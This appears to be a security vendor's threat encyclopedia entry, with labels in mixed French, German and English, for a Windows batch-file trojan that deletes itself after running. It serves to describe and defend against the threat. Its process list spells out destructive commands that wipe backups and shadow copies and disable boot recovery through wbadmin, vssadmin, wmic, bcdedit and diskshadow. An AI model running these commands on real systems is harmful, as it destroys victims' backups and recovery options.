Analysis by: Clive Fuentebella
 

Trojan.Script.Agent.cr (KASPERSKY)

 Plate-forme:

Windows

 Overall Risk:
 Dommages potentiels: :
 Distribution potentielle: :
 reportedInfection:
 Information Exposure Rating::
Faible
Medium
Élevé
Critique

  • Type de grayware:
    Trojan

  • Destructif:
    Non

  • Chiffrement:
    Non

  • In the wild::
    Oui

  Overview

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Wird ausgeführt und löscht sich dann selbst.

  Détails techniques

File size: 707 bytes
File type: BAT
Memory resident: Non

Übertragungsdetails

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

Schleust die folgenden Dateien ein:

  • {Current directory}\sc.txt

Fügt die folgenden Prozesse hinzu:

  • wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
  • wbadmin DELETE BACKUP -keepVersions:0
  • wmic SHADOWCOPY DELETE
  • vssadmin Delete Shadows /All /Quiet
  • bcdedit /set {default} recoveryenabled No
  • bcdedit /set {default} bootstatuspolicy ignoreallfailures
  • vssadmin list shadows
  • cmd.exe /C wbadmin STOP job
  • cmd.exe /C wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet
  • cmd.exe /C wbadmin DELETE CATALOG -quiet
  • cmd.exe /C wbadmin DISABLE backup
  • cmd.exe /C bcdedit /set {default} recoveryenabled No
  • cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
  • cd "{Current directory}"
  • echo delete shadows all>>sc.txt
  • echo exit>>sc.txt
  • cmd.exe /C diskshadow -s sc.txt
  • del /f "{Current directory}\sc.txt"
  • pause
  • del %0

Wird ausgeführt und löscht sich dann selbst.